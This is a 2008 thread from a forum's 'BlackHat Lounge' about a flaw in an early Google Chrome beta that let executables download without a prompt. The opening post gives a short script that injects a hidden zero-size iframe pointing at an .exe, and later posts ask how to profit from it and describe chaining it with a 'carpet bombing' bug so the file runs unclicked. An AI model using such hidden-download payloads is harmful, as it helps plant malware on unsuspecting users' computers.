1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

The evil blackhatters laughs by Google Chrome

Discussion in 'BlackHat Lounge' started by Emalker, Sep 4, 2008.

  1. Emalker

    Emalker Registered Member

    Joined:
    Nov 15, 2007
    Messages:
    59
    Likes Received:
    10
    Googles new browser "Chrome" allows files (executables) to be automatically downloaded to the user's computer without any user prompt.

    Code:
    <script>
    document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
    </script>
     
  2. dirtbag

    dirtbag Senior Member

    Joined:
    Jul 24, 2008
    Messages:
    990
    Likes Received:
    525
    pretty positive they'll have that fixed by the time they go out of beta...
     
  3. ebayer

    ebayer Newbie

    Joined:
    Sep 15, 2008
    Messages:
    11
    Likes Received:
    0
    how could one exploit this? :) PPI?
     
  4. djedje70

    djedje70 Regular Member

    Joined:
    Feb 5, 2008
    Messages:
    239
    Likes Received:
    252
    Location:
    none of ur fr#$%ing biz dude!!!
    For sure it will be fixed shortly.
    Else it's gonna be the end of Google. It will become all to easy for hackers to remotely put some trojans or other shit on computers using it.
     
  5. turbotec

    turbotec Junior Member

    Joined:
    Apr 5, 2008
    Messages:
    181
    Likes Received:
    15
    I have been seeing a lot of people use Google Chrome on other forum's. this could be a huge opportunity for a short while.
     
  6. BozoClown

    BozoClown Junior Member

    Joined:
    Jan 4, 2009
    Messages:
    150
    Likes Received:
    106
    Bad security hole, but it is hard to exploit. You would still have to get the user to click on it after it's been downloaded.

    EDIT: Combined with the carpet bombing security hole, this is REALLY REALLY BAD. The user wouldn't have to click anything in order to run the executable.
     
    • Thanks Thanks x 1
    Last edited by a moderator: Sep 4, 2008
  7. digirax

    digirax Newbie

    Joined:
    Jun 13, 2008
    Messages:
    10
    Likes Received:
    1
    I really don't understand why so many people are jumping on the chrome bandwagon, sure it's from google and in time it may well become the browser of choice but in it's current early beta form it looks and feels rather clunky and is less secure than an open front door.
     
  8. Diabolik

    Diabolik Newbie

    Joined:
    Apr 11, 2011
    Messages:
    4
    Likes Received:
    0
    Maybe because it's being whored on one of the most popular destinations on the entire internet...Google's front page. I don't like the whole thing one bit.